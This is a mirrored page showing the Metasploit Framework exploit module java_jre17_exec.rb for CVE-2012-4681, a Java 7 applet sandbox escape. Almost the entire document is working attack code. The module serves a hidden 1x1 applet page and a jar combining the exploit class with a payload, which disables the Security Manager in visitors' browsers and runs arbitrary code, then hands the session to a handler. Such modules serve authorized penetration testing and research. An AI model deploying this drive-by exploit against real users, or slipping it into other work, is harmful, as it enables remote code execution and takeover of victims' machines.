Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_exec.rb
19637 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  # include Msf::Exploit::Remote::BrowserAutopwn

12
  # autopwn_info({ :javascript => false })

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Java 7 Applet Remote Code Execution',

19
        'Description' => %q{

20
          The exploit takes advantage of two issues in JDK 7: The ClassFinder and

21
          MethodFinder.findMethod().  Both were newly introduced in JDK 7.  ClassFinder is a

22
          replacement for classForName back in JDK 6. It allows untrusted code to obtain a

23
          reference and have access to a restricted package in JDK 7, which can be used to

24
          abuse sun.awt.SunToolkit (a restricted package).  With sun.awt.SunToolkit, we can

25
          actually invoke getField() by abusing findMethod() in Statement.invokeInternal()

26
          (but getField() must be public, and that's not always the case in JDK 6) in order

27
          to access Statement.acc's private field, modify AccessControlContext, and then

28
          disable Security Manager. Once Security Manager is disabled, we can execute

29
          arbitrary Java code.

30


31
          Our exploit has been tested successfully against multiple platforms, including:

32
          IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.

33
        },

34
        'License' => MSF_LICENSE,

35
        'Author' => [

36
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory

37
          'James Forshaw', # Vulnerability discovery according to Oracle's advisory

38
          'jduck',         # metasploit module

39
          'sinn3r',        # metasploit module

40
          'juan vazquez'   # metasploit module

41
        ],

42
        'References' => [

43
          [ 'CVE', '2012-4681' ],

44
          [ 'OSVDB', '84867' ],

45
          [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],

46
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html' ],

47
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/' ],

48
          [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ],

49
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html' ],

50
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/27/lets-start-the-week-with-a-new-java-0day' ],

51
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=852051']

52
        ],

53
        'Platform' => %w{java linux win},

54
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

55
        'Targets' => [

56
          [

57
            'Generic (Java Payload)',

58
            {

59
              'Arch' => ARCH_JAVA,

60
              'Platform' => 'java'

61
            }

62
          ],

63
          [

64
            'Windows Universal',

65
            {

66
              'Arch' => ARCH_X86,

67
              'Platform' => 'win'

68
            }

69
          ],

70
          [

71
            'Linux x86',

72
            {

73
              'Arch' => ARCH_X86,

74
              'Platform' => 'linux'

75
            }

76
          ]

77
        ],

78
        'DefaultTarget' => 0,

79
        'DisclosureDate' => '2012-08-26',

80
        'Notes' => {

81
          'Reliability' => UNKNOWN_RELIABILITY,

82
          'Stability' => UNKNOWN_STABILITY,

83
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

84
        }

85
      )

86
    )

87
  end

88


89
  def on_request_uri(cli, request)

90
    if not request.uri.match(/\.jar$/i)

91
      if not request.uri.match(/\/$/)

92
        send_redirect(cli, get_resource() + '/', '')

93
        return

94
      end

95


96
      print_status("#{self.name} handling request")

97


98
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

99
      return

100
    end

101


102
    paths = [

103
      [ "Exploit.class" ]

104
    ]

105


106
    p = regenerate_payload(cli)

107


108
    jar = p.encoded_jar

109
    paths.each do |path|

110
      1.upto(path.length - 1) do |idx|

111
        full = path[0, idx].join("/") + "/"

112
        if !(jar.entries.map { |e| e.name }.include?(full))

113
          jar.add_file(full, '')

114
        end

115
      end

116
      fd = File.open(File.join(Msf::Config.data_directory, "exploits", "CVE-2012-4681", path), "rb")

117
      data = fd.read(fd.stat.size)

118
      jar.add_file(path.join("/"), data)

119
      fd.close

120
    end

121


122
    print_status("Sending Applet.jar")

123
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

124


125
    handler(cli)

126
  end

127


128
  def generate_html

129
    html = "<html><head></head>"

130
    html += "<body>"

131
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"

132
    html += "</applet></body></html>"

133
    return html

134
  end

135
end

136


137